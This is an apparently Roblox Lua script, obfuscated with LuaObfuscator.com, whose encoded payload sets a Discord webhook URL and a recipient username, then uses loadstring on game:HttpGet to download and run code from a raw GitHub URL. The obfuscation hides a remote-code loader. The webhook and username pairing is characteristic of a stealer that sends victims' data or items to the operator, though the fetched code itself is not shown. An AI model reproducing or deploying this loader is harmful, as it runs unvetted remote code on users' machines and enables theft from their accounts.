--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v72=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-1) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v72-(v72%(932 -(135 + 722 + 74))) ;else local v73=(879 -(282 + 595))^(v32-(1 + 0)) ;return (((v31%(v73 + v73))>=v73) and (569 -(367 + 201))) or ((2564 -(1523 + 114)) -(214 + 713)) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0 + 0 ;local v35;local v36;local v37;local v38;while true do if (v34==(0 -0)) then v35,v36,v37,v38=v1(v16,v19,v19 + 3 );v19=v19 + 4 ;v34=(1045 + 21) -(68 + 997) ;end if (v34==(1271 -(226 + 232 + 812))) then return (v38 * 16777216) + (v37 * (285370 -219834)) + (v36 * (373 -(32 + 85))) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0 + 0 ;local v40;local v41;local v42;local v43;local v44;local v45;while true do local v68=0;local v69;while true do if (v68~=(0 -0)) then else v69=0 + 0 ;while true do if (v69~=(1181 -(1123 + 57))) then else if (v39==(2 + 0)) then local v102=0;while true do if (v102~=0) then else for v118=2 -1 ,v44 do local v119=254 -(163 + 91) ;local v120;local v121;local v122;while true do if (v119~=(1931 -(1869 + 61))) then else v122=nil;while true do if ((1 + 0)~=v120) then else if (v121==(1025 -(706 + 318))) then v122=v22()~=(0 -0) ;elseif (v121==(2 -0)) then v122=v25();elseif (v121==(1254 -(721 + 530))) then v122=v26();end v45[v118]=v122;break;end if (v120~=0) then else local v185=0 + 0 ;local v186;while true do if (v185~=(0 -0)) then else v186=0 + 0 ;while true do if (v186==(1475 -(1329 + 145))) then v120=972 -(140 + 831) ;break;end if (v186==0) then local v189=0 + 0 ;local v190;while true do if (v189==0) then v190=0;while true do if ((1850 -(1409 + 441))~=v190) then else v121=v22();v122=nil;v190=719 -(15 + 703) ;end if (v190~=1) then else v186=1 + 0 ;break;end end break;end end end end break;end end end end break;end if (v119~=0) then else local v161=1500 -(1408 + 92) ;while true do if (v161~=0) then else v120=1086 -(461 + 625) ;v121=nil;v161=439 -(262 + 176) ;end if (1~=v161) then else v119=1722 -(345 + 1376) ;break;end end end end end v43[3]=v22();v102=1 + 0 ;end if (v102==1) then for v123=689 -(198 + 490) ,v24() do local v124=0 + 0 ;local v125;local v126;local v127;local v128;while true do if (v124~=(4 -3)) then else v127=nil;v128=nil;v124=2;end if ((0 -0)~=v124) then else v125=0 + 0 ;v126=nil;v124=1207 -(696 + 510) ;end if ((1 + 1)~=v124) then else while true do if (v125~=(1 -0)) then else v128=nil;while true do if (v126~=(1769 -(1749 + 20))) then else local v187=1262 -(1091 + 171) ;local v188;while true do if (v187==(0 + 0)) then v188=1322 -(1249 + 73) ;while true do if (v188==(0 + 0)) then local v197=0 + 0 ;while true do if (v197==0) then v127=0 -0 ;v128=nil;v197=3 -2 ;end if (v197~=(2 -1)) then else v188=1901 -(106 + 1794) ;break;end end end if (v188==(375 -(123 + 251))) then v126=4 -3 ;break;end end break;end end end if (v126~=(699 -(208 + 490))) then else while true do if (v127~=(0 + 0)) then else v128=v22();if (v21(v128,1 + 0 ,115 -(4 + 110) )==(836 -(660 + 176))) then local v191=0;local v192;local v193;local v194;local v195;local v196;while true do if (v191~=(1429 -(41 + 1386))) then else v196=nil;while true do if (v192==(104 -(17 + 86))) then v195=nil;v196=nil;v192=2;end if (v192==(1 + 1)) then while true do if (v193~=(204 -(14 + 188))) then else local v199=0;local v200;while true do if ((0 -0)~=v199) then else v200=675 -(534 + 141) ;while true do if (v200==(2 -1)) then v193=169 -(122 + 44) ;break;end if (v200~=(0 + 0)) then else if (v21(v195,1 -0 ,3 -2 )==(1 + 0)) then v196[1 + 1 ]=v45[v196[2]];end if (v21(v195,2 + 0 ,3 -1 )~=(66 -(30 + 35))) then else v196[3]=v45[v196[3]];end v200=1 + 0 ;end end break;end end end if (v193~=(1 -0)) then else local v201=0;local v202;while true do if (v201==(1257 -(1043 + 214))) then v202=0 -0 ;while true do if (0~=v202) then else v196={v23(),v23(),nil,nil};if (v194==0) then local v211=0;local v212;local v213;local v214;while true do if (v211~=(320 -(53 + 267))) then else v212=0;v213=nil;v211=1;end if (v211~=(1 + 0)) then else v214=nil;while true do if (v212~=0) then else v213=413 -(15 + 398) ;v214=nil;v212=1 + 0 ;end if (v212==(397 -(115 + 281))) then while true do if (v213==0) then v214=0;while true do if (v214==0) then v196[11 -8 ]=v23();v196[9 -5 ]=v23();break;end end break;end end break;end end break;end end elseif (v194==1) then v196[3]=v24();elseif (v194==(2 + 0)) then v196[3]=v24() -((4 -2)^(58 -42)) ;elseif (v194==(870 -(550 + 317))) then local v217=0 + 0 ;local v218;local v219;while true do if (v217~=(1 -0)) then else while true do if (v218~=(0 + 0)) then else v219=0;while true do if (v219==(0 -0)) then v196[6 -3 ]=v24() -((5 -3)^(5 + 11)) ;v196[289 -(134 + 151) ]=v23();break;end end break;end end break;end if (v217~=(1665 -(970 + 695))) then else v218=0 -0 ;v219=nil;v217=1991 -(582 + 1408) ;end end end v202=3 -2 ;end if (v202~=(1 -0)) then else v193=7 -5 ;break;end end break;end end end if (v193~=(0 -0)) then else local v203=1824 -(1195 + 629) ;while true do if ((1 -0)~=v203) then else v193=1;break;end if (v203==(241 -(187 + 54))) then v194=v21(v128,782 -(162 + 618) ,3 + 0 );v195=v21(v128,381 -(142 + 235) ,4 + 2 );v203=1 + 0 ;end end end if (v193~=(980 -(553 + 424))) then else if (v21(v195,5 -2 ,6 -3 )==(1 -0)) then v196[4]=v45[v196[4 + 0 ]];end v40[v123]=v196;break;end end break;end if (v192==(0 + 0)) then local v198=0 + 0 ;while true do if (v198~=0) then else v193=0;v194=nil;v198=1637 -(1373 + 263) ;end if ((1001 -(451 + 549))==v198) then v192=1 + 0 ;break;end end end end break;end if (v191==(1 -0)) then v194=nil;v195=nil;v191=2;end if (v191==(0 -0)) then v192=0;v193=nil;v191=1385 -(746 + 638) ;end end end break;end end break;end end break;end if (v125~=(0 -0)) then else v126=0 + 0 ;v127=nil;v125=1 -0 ;end end break;end end end v39=344 -(218 + 123) ;break;end end end if (v39==(1329 -(797 + 532))) then local v103=1581 -(1535 + 46) ;local v104;while true do if (v103~=(0 + 0)) then else v104=0 + 0 ;while true do if (v104==(560 -(306 + 254))) then v40={};v41={};v104=1203 -(373 + 829) ;end if (v104~=1) then else v42={};v39=1;break;end end break;end end end break;end if (v69~=(731 -(476 + 255))) then else if (v39~=(1 + 2)) then else local v105=1130 -(369 + 761) ;while true do if (v105==0) then for v129=1 -0 ,v24() do v41[v129-(1 -0) ]=v29();end return v43;end end end if (v39==(1468 -(899 + 568))) then local v106=238 -(64 + 174) ;while true do if (v106~=(0 + 0)) then else v43={v40,v41,nil,v42};v44=v24();v106=604 -(268 + 335) ;end if ((291 -(60 + 230))==v106) then v45={};v39=574 -(426 + 146) ;break;end end end v69=1;end end break;end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=216 -(42 + 174) ;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v46==(1 + 0)) then v49=1 + (1092 -(975 + 117)) ;v50=(v21(v48,(1614 -(1565 + 48)) + 0 ,20) * ((1506 -(363 + 1141))^((996 + 616) -(1183 + 397)))) + v47 ;v46=5 -3 ;end if (v46==(3 + 0)) then if (v51==(0 + 0)) then if (v50==(1975 -(1913 + 62))) then return v52 * ((1138 -(782 + 356)) + 0) ;else local v97=0 -0 ;while true do if (v97==0) then v51=1934 -((832 -(176 + 91)) + (3243 -(157 + 1718))) ;v49=0 -0 ;break;end end end elseif (v51==((3010 + 698) -(1477 + 184))) then return ((v50==(0 -0)) and (v52 * (((1 -0) -0)/(0 + 0)))) or (v52 * NaN) ;end return v8(v52,v51-(1879 -(564 + 292)) ) * (v49 + (v50/((2 -0)^(156 -104)))) ;end if ((304 -(244 + 60))==v46) then v47=v24();v48=v24();v46=1 + 0 ;end if (v46==(478 -(41 + 435))) then v51=v21(v48,1022 -(938 + 63) ,24 + 7 );v52=((v21(v48,32)==1) and  -1) or (1126 -(936 + 189)) ;v46=1 + 2 ;end end end v26=nil;function v26(v53)local v54;if  not v53 then v53=v24();if (v53==(0 -0)) then return "";end end v54=v3(v16,v19,(v19 + v53) -(1019 -(697 + 321)) );v19=v19 + v53 ;local v55={};for v70=1, #v54 do v55[v70]=v2(v1(v3(v54,v70,v70)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=0 -0 ;local v57;while true do if (v56==0) then v57=v1(v16,v19,v19);v19=v19 + (1 -0) ;v56=1;end if (v56==(2 -1)) then return v57;end end end v23=nil;function v23()local v58,v59=v1(v16,v19,v19 + 1 + 1 );v19=v19 + (3 -1) ;return (v59 * 256) + v58 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then v20=v0(v3(v60,1,1));return "";else local v74=v2(v0(v60,16));if v20 then local v78=0;local v79;while true do if (v78==1) then return v79;end if (v78==0) then v79=v5(v74,v20);v20=nil;v78=1;end end else return v74;end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==1) then v67=v61[3];return function(...)local v80=v65;local v81=v66;local v82=v67;local v83=v28;local v84=1;local v85= -1;local v86={};local v87={...};local v88=v12("#",...) -1 ;local v89={};local v90={};for v94=0,v88 do if (v94>=v82) then v86[v94-v82 ]=v87[v94 + 1 ];else v90[v94]=v87[v94 + 1 ];end end local v91=(v88-v82) + 1 ;local v92;local v93;while true do v92=v80[v84];v93=v92[1];if (v93<=5) then if (v93<=2) then if (v93<=0) then v84=v92[3];elseif (v93==1) then local v131=0;local v132;while true do if (v131==0) then v132=v92[2];v90[v132]=v90[v132](v13(v90,v132 + 1 ,v85));break;end end elseif (v90[v92[2]]==v92[4]) then v84=v84 + 1 ;else v84=v92[3];end elseif (v93<=3) then local v108=v92[2];local v109,v110=v83(v90[v108](v13(v90,v108 + 1 ,v92[3])));v85=(v110 + v108) -1 ;local v111=0;for v115=v108,v85 do v111=v111 + 1 ;v90[v115]=v109[v111];end elseif (v93>4) then do return;end else v90[v92[2]]();end elseif (v93<=8) then if (v93<=6) then v90[v92[2]]=v92[3];elseif (v93>7) then local v133;local v134,v135;local v136;local v137;v90[v92[2]][v92[3]]=v92[4];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v63[v92[3]];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v63[v92[3]];v84=v84 + 1 ;v92=v80[v84];v137=v92[2];v136=v90[v92[3]];v90[v137 + 1 ]=v136;v90[v137]=v136[v92[4]];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v92[3];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v92[3]~=0 ;v84=v84 + 1 ;v92=v80[v84];v137=v92[2];v134,v135=v83(v90[v137](v13(v90,v137 + 1 ,v92[3])));v85=(v135 + v137) -1 ;v133=0;for v158=v137,v85 do local v159=0;while true do if (v159==0) then v133=v133 + 1 ;v90[v158]=v134[v133];break;end end end v84=v84 + 1 ;v92=v80[v84];v137=v92[2];v90[v137]=v90[v137](v13(v90,v137 + 1 ,v85));v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]();v84=v84 + 1 ;v92=v80[v84];v84=v92[3];else v90[v92[2]]=v92[3]~=0 ;end elseif (v93<=10) then if (v93==9) then v90[v92[2]][v92[3]]=v92[4];else local v152=0;while true do if (v152==1) then v90[v92[2]]=v63[v92[3]];v84=v84 + 1 ;v92=v80[v84];v152=2;end if (v152==4) then v84=v92[3];break;end if (0==v152) then v90[v92[2]][v92[3]]=v92[4];v84=v84 + 1 ;v92=v80[v84];v152=1;end if (v152==2) then v90[v92[2]][v92[3]]=v92[4];v84=v84 + 1 ;v92=v80[v84];v152=3;end if (v152==3) then v90[v92[2]]=v92[3];v84=v84 + 1 ;v92=v80[v84];v152=4;end end end elseif (v93==11) then v90[v92[2]]=v63[v92[3]];else local v155=0;local v156;local v157;while true do if (v155==0) then v156=v92[2];v157=v90[v92[3]];v155=1;end if (v155==1) then v90[v156 + 1 ]=v157;v90[v156]=v157[v92[4]];break;end end end v84=v84 + 1 ;end end;end if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31303933373137392O3830333436383332392F5355342D526F474A2D6D645444666333304C7545395A307972586F38474239712D6959793859736D2D54516775775466437555664A676232626B3247766D5A796B2D6237030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585A63726970742F6D61696E2F4C79706865725363726970747303083O00557365724E616D6503083O004B414B534953383903093O00557365724E616D653200173O0012063O00013O0026023O000E0001000200044O000E000100120B000100033O00300800010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000500016O000200056O00013O00024O00010001000100044O001600010026023O00010001000100044O0001000100120B000100033O00300A0001000A000B00122O000100033O00302O0001000C000B00124O00023O00044O000100012O00053O00017O00",v9(),...);end
